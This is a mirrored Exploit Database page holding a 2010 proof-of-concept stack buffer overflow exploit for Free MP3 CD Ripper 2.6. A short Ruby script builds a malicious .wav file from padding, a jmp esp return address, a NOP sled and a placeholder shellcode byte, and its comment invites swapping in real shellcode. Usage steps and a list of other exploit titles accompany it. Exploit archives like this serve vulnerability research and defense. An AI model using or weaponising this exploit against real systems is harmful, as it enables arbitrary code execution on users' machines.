Free MP3 CD Ripper 2.6 – ‘.wav’ (PoC)

Exploit Database
11 阅读

作者： Richard leahy

日期： 2010-03-30
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/11975/

# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2

#to exploit thisopen up the application select file -> wav converter -> wav to mp3

#use your favourite programming language and print out the contents into a text file. save the text #file as a .wav
#then open up the wav file and boom.

#feel free to email me leahy_rich@hotmail.com

#code

!#/usr/bin/env ruby
nop = "\x90" # nop
shellcode = "\xCC" #just an interupt can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76" #find a jmp esp i will use imagehlp, little endian so reverse it
boom = "A" * 4112 + jmp_esp + nop * 50 + shellcode

puts boom

last Exploits
Free MP3 CD Ripper 2.6 – ‘.wav’ (PoC)的更多信息

Microsoft Office 2007 – Malformed Document Stack Buffer Overflow：
Real player 14.0.2.633 – Buffer Overflow (Denial of Service) (PoC)：
Sun Java System Web Server 6.1/7.0 – ‘TRACE’ Heap Buffer Overflow (PoC)：
QNap QVR Client 5.1.1.30070 – ‘Password’ Denial of Service (PoC)：
WebKit – ‘WebCore::RenderMultiColumnSet::updateMinimumColumnHeight’ Use-After-Free：
lighttpd – Denial of Service (PoC)：
InfraRecorder 0.53 – Memory Corruption (Denial of Service)：
RarmaRadio 2.72.5 – Denial of Service (PoC)：